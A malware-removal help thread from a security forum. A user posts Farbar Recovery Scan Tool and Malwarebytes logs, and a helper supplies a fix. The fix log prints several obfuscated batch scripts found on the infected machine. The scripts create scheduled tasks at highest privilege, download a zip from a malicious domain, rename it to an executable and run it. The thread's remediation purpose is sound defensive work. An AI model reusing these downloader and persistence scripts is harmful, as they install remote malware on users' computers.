2009-07-13 22:14 - 2009-07-13 22:14 - 000001034 _____ () C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa.bat
2018-01-14 01:33 - 2010-11-21 00:24 - 000186368 _____ (Microsoft Corporation) C:\Users\Franco\AppData\Local\AAfuIkYhYoa.exe
2017-07-27 21:19 - 2018-01-07 22:36 - 000007606 _____ () C:\Users\Franco\AppData\Local\Resmon.ResmonCfg
2018-01-14 01:33 - 2018-01-14 01:33 - 000000001 _____ () C:\Users\Franco\AppData\Local\WMI.ini
 
Some files in TEMP:
====================
2017-11-25 17:09 - 2017-08-16 08:31 - 000838200 _____ (BlueStack Systems, Inc.) C:\Users\Franco\AppData\Local\Temp\BlueStacksClientUninstaller.exe
2017-11-25 17:09 - 2017-08-16 08:30 - 000421400 _____ (CodeTitans) C:\Users\Franco\AppData\Local\Temp\JSON.dll
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
LastRegBack: 2018-01-10 13:49
 
==================== End of FRST.txt ============================

Edited by Pepsiman22, 15 January 2018 - 06:23 PM.


#4 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,602 posts
  • ONLINE
  •  
  • Gender:Male
  • Local time:12:34 PM

Posted 15 January 2018 - 08:38 PM

No need to use the spoiler tags here, they would get more in the way than anything else :P

On a side note, can you provide me the Malwarebytes log you got when you ran a scan to remove the infection? If it didn't detect anything, let me know.

unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#5 Pepsiman22

Pepsiman22
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:34 PM

Posted 15 January 2018 - 09:39 PM

Here we go. Had to translate most of it myself, since i have it on spanish (definetly my bad) 
 

Malwarebytes
www.malwarebytes.com
 
-Registry Details-
analysis date: 15/1/18
analysis time: 1:36
registry file: b6dcd614-f9ad-11e7-88d5-d0509965a841.json
Administrator: yes
 
-Software info-
Version: 3.3.1.2183
component version: 1.0.262
Update package version: 1.0.3695
License: Prueba
 
-System info-
SO: Windows 7 Service Pack 1
CPU: x64
Sistem files: NTFS
User: Porota\Franco
 
-analysis summary-
Analysis type: Threats analysis
Result: Completed
Analyzed objects: 234505
threats detected: 56
threats in quarantine: 56
Time spent: 5 min, 0 seg
 
-analysis options-
Memory: enabled
Startup: enabled
File system: enabled
File: enabled
Rootkits: Disabled
Heurístic: enabled
PUP: Detect
PUM: Detect
 
-Analysis Detail-
Process: 0
(No threats detected)
 
Module: 0
(No threats detected)
 
Registry key: 6
PUP.Optional.MailRu, HKU\S-1-5-21-2176517476-3644118065-910164434-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}, Will be deleted on startup, [611], [382913],1.0.3695
PUP.Optional.MailRu, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\hcadgijmedbfgciegjomfpjcdchlhnif, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, HKLM\SOFTWARE\WOW6432NODE\GOOGLE\CHROME\EXTENSIONS\bhjhnafpiilpffhglajcaepjbnbjemci, Will be deleted on startup, [611], [448286],1.0.3695
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\DZOPERCOMJHAR, Will be deleted on startup, [39], [475864],1.0.3695
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{BC1705E7-7DCA-42FC-8F6B-5812E8A13A0B}, Will be deleted on startup, [39], [475864],1.0.3695
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{BC1705E7-7DCA-42FC-8F6B-5812E8A13A0B}, Will be deleted on startup [39], [475864],1.0.3695
 
Registry Value: 4
PUP.Optional.MailRu, HKU\S-1-5-21-2176517476-3644118065-910164434-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|URL, Will be deleted on startup, [611], [382913],1.0.3695
PUP.Optional.MailRu, HKU\S-1-5-21-2176517476-3644118065-910164434-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|FAVICONURLFALLBACK, Will be deleted on startup, [611], [382913],1.0.3695
PUP.Optional.MailRu, HKU\S-1-5-21-2176517476-3644118065-910164434-1000\SOFTWARE\MICROSOFT\INTERNET EXPLORER\SEARCHSCOPES\{FFEBBF0A-C22C-4172-89FF-45215A135AC7}|SUGGESTIONSURL, Will be deleted on startup, [611], [382913],1.0.3695
PUP.Optional.StartPage, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{BC1705E7-7DCA-42FC-8F6B-5812E8A13A0B}|PATH, Will be deleted on startup, [39], [475863],1.0.3695
 
Registry Data: 0
(No threats detected)
 
data sequence: 0
(No threats detected)
 
Folder: 10
PUP.Optional.WinThruster, C:\ProgramData\Solvusoft\Solvusoft Suite\Logs, Will be deleted on startup, [7812], [461214],1.0.3695
PUP.Optional.WinThruster, C:\PROGRAMDATA\SOLVUSOFT\SOLVUSOFT SUITE, Will be deleted on startup, [7812], [461214],1.0.3695
PUP.Optional.MailRu, C:\PROGRAM FILES (X86)\MAIL.RU, Will be deleted on startup, [611], [384138],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration\distribution, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration\unity, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\_metadata, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\icons, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\EXTENSIONS\hcadgijmedbfgciegjomfpjcdchlhnif, Will be deleted on startup [611], [448282],1.0.3695
 
File: 36
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\ROAMING\MICROSOFT\INTERNET EXPLORER\QUICK LAUNCH\MAIL.RU.LNK, Will be deleted on startup, [611], [384473],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\AA5KQNF6.DEFAULT\EXTENSIONS\{A38384B3-2D1D-4F36-BC22-0F7AE402BCD7}.XPI, Will be deleted on startup, [611], [458842],1.0.3695
PUP.Optional.MailRu.Generic, C:\USERS\FRANCO\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\AA5KQNF6.DEFAULT\EXTENSIONS\homepage@mail.ru.xpi, Will be deleted on startup [7605], [462926],1.0.3695
PUP.Optional.MailRu.Generic, C:\USERS\FRANCO\APPDATA\ROAMING\MOZILLA\FIREFOX\PROFILES\AA5KQNF6.DEFAULT\EXTENSIONS\search@mail.ru.xpi, Will be deleted on startup, [7605], [462926],1.0.3695
PUP.Optional.WinThruster, C:\PROGRAMDATA\SOLVUSOFT\SOLVUSOFT SUITE\LOGS\Service.log.txt, Se eliminará al reiniciar, [7812], [461214],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\icons\128.png, Will be deleted on startup [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\icons\16.png, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\icons\48.png, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\icons\512.png, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration\distribution\background.js,Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration\distribution\distribution-module.js, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration\unity\unity-stub-background.js, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\integration\unity\unity-stub-inject.js, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\_metadata\computed_hashes.json, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\_metadata\verified_contents.json, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\manifest.json, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\Users\Franco\AppData\Local\Google\Chrome\User Data\Default\Extensions\hcadgijmedbfgciegjomfpjcdchlhnif\12.0.28_0\metrics.js, Will be deleted on startup, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Preferences, Replaced, [611], [448282],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [611], [448286],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\FAVORITES\Mail.Ru Агент - используй для общения!.url, Will be deleted on startup, [611], [471428],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\FAVORITES\Mail.Ru.url, Will be deleted on startup, [611], [471428],1.0.3695
PUP.Optional.StartPage, C:\WINDOWS\SYSTEM32\TASKS\DZOPERCOMJHAR, Will be deleted on startup, [39], [475864],1.0.3695
PUP.Optional.GameHack, C:\PROGRAM FILES (X86)\CHEAT ENGINE 6.4\STANDALONEPHASE1.DAT, Will be deleted on startup, [639], [393793],1.0.3695
PUP.Optional.GameHack, C:\PROGRAM FILES (X86)\CHEAT ENGINE 6.7\STANDALONEPHASE1.DAT, Will be deleted on startup, [639], [393793],1.0.3695
CheatTool.CETTrainer, C:\$RECYCLE.BIN\S-1-5-21-2176517476-3644118065-910164434-1000\$R7TEAJ0.ZIP, Will be deleted on startup, [7562], [116813],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-3A0SA.TMP\A6A4DE57, Will be deleted on startup, [146], [423225],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-8GSTD.TMP\A2268E72, Will be deleted on startup, [146], [413261],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-G4H9S.TMP\93B2FB10, Will be deleted on startup, [146], [413261],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-3A0SA.TMP\FFC823AA, Will be deleted on startup, [146], [413261],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-CCIF7.TMP\2D49C819, Will be deleted on startup, [146], [413261],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-8GSTD.TMP\536D6540, Will be deleted on startup, [146], [423225],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-FS4QU.TMP\KAV2.DLL, Will be deleted on startup, [146], [423225],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-4NH42.TMP\C623B310, Will be deleted on startup, [146], [413261],1.0.3695
Adware.FileTour, C:\USERS\FRANCO\APPDATA\LOCAL\TEMP\IS-FS4QU.TMP\DBA78BB6, Will be deleted on startup, [146], [413261],1.0.3695
PUP.Optional.MailRu, C:\USERS\FRANCO\APPDATA\LOCAL\GOOGLE\CHROME\USER DATA\Default\Secure Preferences, Replaced, [611], [477962],1.0.3695
 
 
physical sector: 0
(No threats detected)
 
 
(end)

Edited by Pepsiman22, 15 January 2018 - 09:39 PM.


#6 Aura

Aura

    Bleepin' Special Ops


  • Malware Response Team
  • 19,602 posts
  • ONLINE
  •  
  • Gender:Male
  • Local time:12:34 PM

Posted 16 January 2018 - 08:03 AM

No need to translate any logs, I understand them just fine :)

iO3R662.pngFarbar Recovery Scan Tool (FRST) - Fix mode
Follow the instructions below to execute a fix on your system using FRST, and provide the log in your next reply.
  • Download the attached fixlist.txt file, and save it on your Desktop (or wherever your FRST.exe/FRST64.exe executable is located)
  • Right-click on the FRST executable and select Spcusrh.pngRun as Administrator (for Windows Vista, 7, 8, 8.1 and 10 users)
  • Click on the Fix button
    NYA5Cbr.png
  • On completion, a message will come up saying that the fix has been completed and it'll open a log in Notepad
  • Copy and paste its content in your next reply

Attached Files


unite_blue.png
Security Administrator | Sysnative Windows Update Senior Analyst | Malware Hunter | @SecurityAura
My timezone UTC-05:00 (East. Coast). If I didn't reply to you within 48 hours, please send me a PM.


#7 Pepsiman22

Pepsiman22
  • Topic Starter

  • Members
  • 7 posts
  • OFFLINE
  •  
  • Local time:01:34 PM

Posted 16 January 2018 - 04:35 PM

Here you go! :)

Fix result of Farbar Recovery Scan Tool (x64) Version: 14.01.2018
Ran by Franco (16-01-2018 18:32:02) Run:1
Running from C:\Users\Franco\Downloads
Loaded Profiles: Franco (Available Profiles: Franco)
Boot Mode: Normal
==============================================
 
fixlist content:
*****************
CloseProcesses:
CreateRestorePoint:
 
cmd: type "C:\Program Files (x86)\Common Files\OeYgZvEuU"
cmd: type "C:\Program Files (x86)\Common Files\OeYgZvEuU.bat"
cmd: type "C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa"
cmd: type "C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa.bat"
 
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\clgckgfbhciacomhlchmgdnplmdiadbj
DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\dijfnbhlogmffhgpelodglnnkncadnbi
 
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
GroupPolicy: Restriction <==== ATTENTION
GroupPolicy\User: Restriction <==== ATTENTION
 
FF Homepage: Mozilla\Firefox\Profiles\aa5kqnf6.default -> hxxps://inline.go.mail.ru/homepage?inline_comp=hp&inline_hp_cnt=11956636
FF NewTabOverride: Mozilla\Firefox\Profiles\aa5kqnf6.default -> Enabled: homepage@mail.ru
 
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(6): schtasks.exe -> /Change /TN "\dzopercomjhar" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(15): schtasks.exe -> /Change /TN "\mtxoaIdylJOZ" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(16): schtasks.exe -> /Change /TN "\oieMmex" /ENABLE
Task: {53B84441-F5CF-4379-AC97-73520A813C20} - C:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(17): schtasks.exe -> /Change /TN "\pSER" /ENABLE
 
AlternateDataStreams: C:\Users\Franco\AppData\Local\Mjc7tFDl:8ozO9lwap8D2aIzrlH [2270]
AlternateDataStreams: C:\Users\Franco\AppData\Local\Temp:ctdNU4MXUVOLiXUVWJ4jPCjB [2028]
 
C:\Program Files (x86)\Common Files\OeYgZvEuU
C:\Program Files (x86)\Common Files\OeYgZvEuU.bat
C:\ProgramData\Mail.Ru
C:\Users\Franco\AppData\Local\Mail.Ru
C:\Users\Franco\AppData\Local\AAfuIkYhYoa.exe
C:\Users\Franco\AppData\Local\WMI.ini
C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa
C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa.bat
 
 
EmptyTemp:
*****************
 
Processes closed successfully.
Restore point was successfully created.
 
========= type "C:\Program Files (x86)\Common Files\OeYgZvEuU" =========
 
@echo off
c%AopQKJioeUAoE%opy /y "C:%yIvEwYirtI%\Users\Franco\Ap%yVhGdeAoOuEe%pData\Roaming\YaOYcLIZDWQaa" "C:\U%oqfAiAyigHB%sers\Fra%cukSI%nco\AppData\Roaming\Ya%oeAOyeIACra%OYcLIZDWQaa.bat"
copy /y "C:\Program F%zBbJYVAq%iles (x86)\XASormJT" "C:\Program Fil%uRIWV%es (%YapiY%x86)\XASor%KJKCe%mJT.b%IuDagdEU%at"
sc%onsVyuBYmaY%htasks /create /tn "oie%UUzN%Mmex" /tr "'C:\Progra%EYUpIAimar%m Files (x86)%YaEXyuZfpcV%\XASormJT.bat' " /s%EoSfOTY%c ONLOGO%qNWM%N /de%rBPBuA%lay 0003:00 /rl highest /f
set wEaOyyaOAMI%gAyAEY%=%RaNdom%%RAndoM%
"C:\Users\F%RRGdGACyB%ranc%ioOCnUoY%o\AppData\Local\AAfuIkYhYoa.exe" /T%bOBeIHAOEKcZ%RaNsFER C%IAcAzbo%iXV /doWnlOAD /PrI%LemSiAsvpLE%orIty High http://domainpr%ugTAscYo%ompt.%Ypya%in%RuYeNZOuaOuE%f%AMuUKy%o%AYDOauoYUoisc%/lg%yEWfOBXnSI%0t%RJHaUEQUl%6btu1qdg.zip "%evIAhbEYAK%C:\Users\Franco\%uYAYjuA%AppDa%ywSnGaOeYYO%ta\Local\Temp\OoiaywSo%EYjeuurHpNC%l.zip"
rename "C:\%lzuUNhaYyiMN%User%iZaoyzAPhu%s\Franco\AppData\Local\Temp%Efhi%\OoiaywSol.zip" %wEaOyyaOAMI%.ex%yrhIAuOiiOua%e
cmd /c ""C:\Users\Franco\App%rEaAMHXESIh%Data%uYIaEuOID%\Local\Temp%TevoOwUoecf%\%wEaOyyaOAMI%.exe" i"%acEeYUUu%
========= End of CMD: =========
 
 
========= type "C:\Program Files (x86)\Common Files\OeYgZvEuU.bat" =========
 
@echo off
c%AopQKJioeUAoE%opy /y "C:%yIvEwYirtI%\Users\Franco\Ap%yVhGdeAoOuEe%pData\Roaming\YaOYcLIZDWQaa" "C:\U%oqfAiAyigHB%sers\Fra%cukSI%nco\AppData\Roaming\Ya%oeAOyeIACra%OYcLIZDWQaa.bat"
copy /y "C:\Program F%zBbJYVAq%iles (x86)\XASormJT" "C:\Program Fil%uRIWV%es (%YapiY%x86)\XASor%KJKCe%mJT.b%IuDagdEU%at"
sc%onsVyuBYmaY%htasks /create /tn "oie%UUzN%Mmex" /tr "'C:\Progra%EYUpIAimar%m Files (x86)%YaEXyuZfpcV%\XASormJT.bat' " /s%EoSfOTY%c ONLOGO%qNWM%N /de%rBPBuA%lay 0003:00 /rl highest /f
set wEaOyyaOAMI%gAyAEY%=%RaNdom%%RAndoM%
"C:\Users\F%RRGdGACyB%ranc%ioOCnUoY%o\AppData\Local\AAfuIkYhYoa.exe" /T%bOBeIHAOEKcZ%RaNsFER C%IAcAzbo%iXV /doWnlOAD /PrI%LemSiAsvpLE%orIty High http://domainpr%ugTAscYo%ompt.%Ypya%in%RuYeNZOuaOuE%f%AMuUKy%o%AYDOauoYUoisc%/lg%yEWfOBXnSI%0t%RJHaUEQUl%6btu1qdg.zip "%evIAhbEYAK%C:\Users\Franco\%uYAYjuA%AppDa%ywSnGaOeYYO%ta\Local\Temp\OoiaywSo%EYjeuurHpNC%l.zip"
rename "C:\%lzuUNhaYyiMN%User%iZaoyzAPhu%s\Franco\AppData\Local\Temp%Efhi%\OoiaywSol.zip" %wEaOyyaOAMI%.ex%yrhIAuOiiOua%e
cmd /c ""C:\Users\Franco\App%rEaAMHXESIh%Data%uYIaEuOID%\Local\Temp%TevoOwUoecf%\%wEaOyyaOAMI%.exe" i"%acEeYUUu%
========= End of CMD: =========
 
 
========= type "C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa" =========
 
@echo off
copy /y "C:\Program Files (x86)\Commo%umxUVraviEs%n FileîiW%s\O%zOgiAS%eYgZvEuU" "C:\Program Files (x86)\%YoNNA%Common Files\OeYgZvEuU.bat"
co%AQILU%py /%eEeElb%y "C:\Windows\EOr%oHxSgaOcea%UYoez" "C:%roek%\W%OUoOoMKG%indows\EOrU%ohYfXCbCyc%Yoez.bat"
sc%aOoNcoua%h%eiUGI%t%pQoRdyiEXi%ask%ecAx%s /create /tn "mtxoaIdylJOZ" /tr "'%AZJNXoWymE%C:\Windows\EOrUYoe%btoYNu%z.bat' " /sc m%ceoAaIUOxy%inute /mo 180 /rl highest /f
set FuuqL=%RANdom%%raNdom%
"C:\Users\%arApXXuUeeor%Fr%nyOASqyL%an POeeLuJyUB%co\AppData\Local\AAfuIkYh%YfLniyn%Yoa.exe" /tRanSFeR CYy%uuIjE%XZeDIyZQ /dO%ooyyoWieUUsj%WnLoAd /pRiORITy high http://domainpr iEeQTe%ompt.info/lg0t6btu1qdg.zip "C:\Users\Franco\%iYdIoEF%AppDa%yaIhI%ta\Local%soFueOuz%\%yLaIcmY%Temp\%QPUhnUYIwAi%ep%IAyuYuU%AZufo.zip"
rename "C:\%aoaCvEeK%Us%ZGuuQ%e%rIII%rs\Franco\%tNacYQiMQsbc%A%QyYQVrsPer%ppData\Local\%cAaCUyJyyoIUI%Temp\epAZufo.zip" %FuuqL%.e%eYroScu%xe
cmd /c ""C:%NYygPdjAiK%\Users\Franco\A%AIbIyEEa%ppDa%EOdjbyyEE%ta\L%hgwU%ocal\%SAyG%Temp\%FuuqL%.exe" i"
========= End of CMD: =========
 
 
========= type "C:\Users\Franco\AppData\Roaming\YaOYcLIZDWQaa.bat" =========
 
@echo off
copy /y "C:\Program Files (x86)\Commo%umxUVraviEs%n FileîiW%s\O%zOgiAS%eYgZvEuU" "C:\Program Files (x86)\%YoNNA%Common Files\OeYgZvEuU.bat"
co%AQILU%py /%eEeElb%y "C:\Windows\EOr%oHxSgaOcea%UYoez" "C:%roek%\W%OUoOoMKG%indows\EOrU%ohYfXCbCyc%Yoez.bat"
sc%aOoNcoua%h%eiUGI%t%pQoRdyiEXi%ask%ecAx%s /create /tn "mtxoaIdylJOZ" /tr "'%AZJNXoWymE%C:\Windows\EOrUYoe%btoYNu%z.bat' " /sc m%ceoAaIUOxy%inute /mo 180 /rl highest /f
set FuuqL=%RANdom%%raNdom%
"C:\Users\%arApXXuUeeor%Fr%nyOASqyL%an POeeLuJyUB%co\AppData\Local\AAfuIkYh%YfLniyn%Yoa.exe" /tRanSFeR CYy%uuIjE%XZeDIyZQ /dO%ooyyoWieUUsj%WnLoAd /pRiORITy high http://domainpr iEeQTe%ompt.info/lg0t6btu1qdg.zip "C:\Users\Franco\%iYdIoEF%AppDa%yaIhI%ta\Local%soFueOuz%\%yLaIcmY%Temp\%QPUhnUYIwAi%ep%IAyuYuU%AZufo.zip"
rename "C:\%aoaCvEeK%Us%ZGuuQ%e%rIII%rs\Franco\%tNacYQiMQsbc%A%QyYQVrsPer%ppData\Local\%cAaCUyJyyoIUI%Temp\epAZufo.zip" %FuuqL%.e%eYroScu%xe
cmd /c ""C:%NYygPdjAiK%\Users\Franco\A%AIbIyEEa%ppDa%EOdjbyyEE%ta\L%hgwU%ocal\%SAyG%Temp\%FuuqL%.exe" i"
========= End of CMD: =========
 
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\clgckgfbhciacomhlchmgdnplmdiadbj" => removed successfully
"HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\dijfnbhlogmffhgpelodglnnkncadnbi" => removed successfully
"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" => removed successfully
C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully
C:\Windows\system32\GroupPolicy\User => moved successfully
"Firefox homepage" => removed successfully
"Firefox NewTabOverride (homepage@mail.ru) " => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{53B84441-F5CF-4379-AC97-73520A813C20} => could not remove key. ErrorCode1: 0x00000002
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{53B84441-F5CF-4379-AC97-73520A813C20}" => removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\TreeC:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(6): schtasks.exe" => not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Boot\{53B84441-F5CF-4379-AC97-73520A813C20}" => removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{53B84441-F5CF-4379-AC97-73520A813C20} => key not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\TreeC:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(15): schtasks.exe" => not found
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{53B84441-F5CF-4379-AC97-73520A813C20} => key not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\TreeC:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(16): schtasks.exe" => not found
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{53B84441-F5CF-4379-AC97-73520A813C20} => key not found
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\TreeC:\Windows\System32\Tasks\AVAST Software\Gaming mode Task Scheduler recovery => Command(17): schtasks.exe" => not found
C:\Users\Franco\AppData\Local\Mjc7tFDl => ":8ozO9lwap8D2aIzrlH" ADS removed successfully
C:\Users\Franco\AppData\Local\Temp => ":ctdNU4MXUVOLiXUVWJ4jPCjB" ADS removed successfully
C:\Program Files (x86)\Common Files\OeYgZvEuU => moved successfully
C:\Program Files (x86)\Common Files\OeYgZvEuU.bat => moved successfully
C:\ProgramData\Mail.Ru => moved successfully
C:\Users\Franco\AppData\Local\Mail.Ru => moved successfully
C:\Users\Franco\AppData\Local\AAfuIkYhYoa.exe => moved successfully
C:\Users\Franco\AppData\Local\WMI.ini => moved successfully
